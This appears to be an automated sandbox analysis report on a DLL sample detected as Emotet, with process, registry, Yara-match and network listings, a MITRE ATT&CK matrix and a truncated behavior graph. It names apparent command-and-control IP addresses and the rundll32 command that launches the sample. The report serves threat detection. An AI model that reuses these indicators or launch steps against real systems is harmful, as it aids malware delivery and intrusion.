                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,3_2_1001FC43

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.16.218.101 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.138.98.34 80Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6472 -ip 6472Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 524Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6472 -ip 6472Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 512Jump to behavior
                      Source: loaddll32.exe, 00000000.00000000.263558904.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.261539178.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.288027395.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.286794306.0000000001AC0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.777358248.0000000003300000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.263558904.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.261539178.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.288027395.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.286794306.0000000001AC0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.777358248.0000000003300000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.263558904.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.261539178.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.288027395.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.286794306.0000000001AC0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.777358248.0000000003300000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000000.263558904.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.261539178.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.288027395.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.286794306.0000000001AC0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.777358248.0000000003300000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000000.263558904.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.261539178.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.288027395.0000000001AC0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.286794306.0000000001AC0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.777358248.0000000003300000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,2_2_10027704
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,2_2_1000A803
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,2_2_10023880
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_10027704
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_1000A803
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_10023880
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10022853 cpuid 2_2_10022853
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001F914 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_1001F914
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100178B6 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,2_2_100178B6

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: Amcache.hve.14.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exe, 00000017.00000002.774093971.000002338E841000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000017.00000002.774294710.000002338E902000.00000004.00000001.sdmp, svchost.exe, 00000017.00000002.774007972.000002338E829000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 13.2.rundll32.exe.5120000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4850000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4ee0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4f10000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.b50000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.5240000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47f0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5230000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.2e20000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5430000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1500000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f50000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5200000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.30f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4eb0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1500000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5030000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1500000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5530000.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.30c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.48d0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4d50000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2f50000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.51b0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.50e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47c0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ae0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2f50000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5400000.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ab0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.51e0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5560000.22.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4ad0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4610000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4820000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4570000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1500000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.af0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1500000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.af0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.50b0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47c0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.30c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1500000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.2e20000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5560000.22.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1500000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4d50000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5500000.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1500000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2f50000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4540000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4660000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5000000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5120000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.c10000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4f10000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5400000.18.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.50b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5150000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ab0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5200000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4c30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1500000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5590000.23.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.5210000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4660000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.51b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2f50000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4eb0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4820000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4690000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.5210000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4d80000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.b50000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1500000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.ad0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.e60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5000000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.5500000.20.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4f40000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.304824769.00000000050E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.304733316.00000000050B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.305003073.00000000051E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778909402.0000000005431000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.286552378.0000000001500000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.263438129.0000000001500000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264383402.0000000004AE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.288122197.0000000002F51000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.253587065.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778167159.0000000005000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264309085.0000000004851000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778579352.0000000005231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.779222222.0000000005591000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.304040907.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778010320.0000000004EE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.777944852.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.261789645.0000000002F51000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778445714.0000000005151000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264108438.0000000004660000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264358890.0000000004AB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.253623838.0000000000E61000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.777650877.00000000048D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.305075397.0000000005210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.774608626.0000000000C11000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.263623393.0000000002F51000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264257364.00000000047F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.305144261.0000000005241000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264036329.0000000004540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.776784898.0000000002E20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.287905795.0000000001500000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.773982727.0000000000B01000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.261326526.0000000001500000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.254173027.0000000004610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264146263.0000000004691000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264222347.00000000047C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.774216836.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.777836240.0000000004D81000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.263454210.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.777801455.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.304925939.00000000051B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.779081718.0000000005531000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264062913.0000000004571000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.773825240.0000000000AD0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.304079394.00000000030F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.287008332.0000000002F51000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.315220757.0000000001500000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778524005.0000000005200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778353822.0000000005120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778061174.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778216857.0000000005031000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.265146904.0000000004C31000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.265087151.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778826105.0000000005400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.779165292.0000000005560000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778104537.0000000004F41000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.254208432.0000000004741000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264280922.0000000004820000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.779010821.0000000005500000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,2_2_100011C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,3_2_100011C0

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSystem Information Discovery45SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsSecurity Software Discovery61SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading2Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion3DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Regsvr321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRundll321Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553140 Sample: xxWrY2YG7s Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 51 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->51 53 85.214.67.203 STRATOSTRATOAGDE Germany 2->53 55 23 other IPs or domains 2->55 67 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->67 69 Multi AV Scanner detection for domain / URL 2->69 71 Found malware configuration 2->71 73 6 other signatures 2->73 11 loaddll32.exe 1 2->11         started        13 svchost.exe 2->13         started        16 svchost.exe 8 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 21 cmd.exe 1 11->21         started        23 rundll32.exe 2 11->23         started        26 regsvr32.exe 11->26         started        34 2 other processes 11->34 79 Changes security center settings (notifications, updates, antivirus, firewall) 13->79 28 MpCmdRun.exe 13->28         started        30 WerFault.exe 16->30         started        32 WerFault.exe 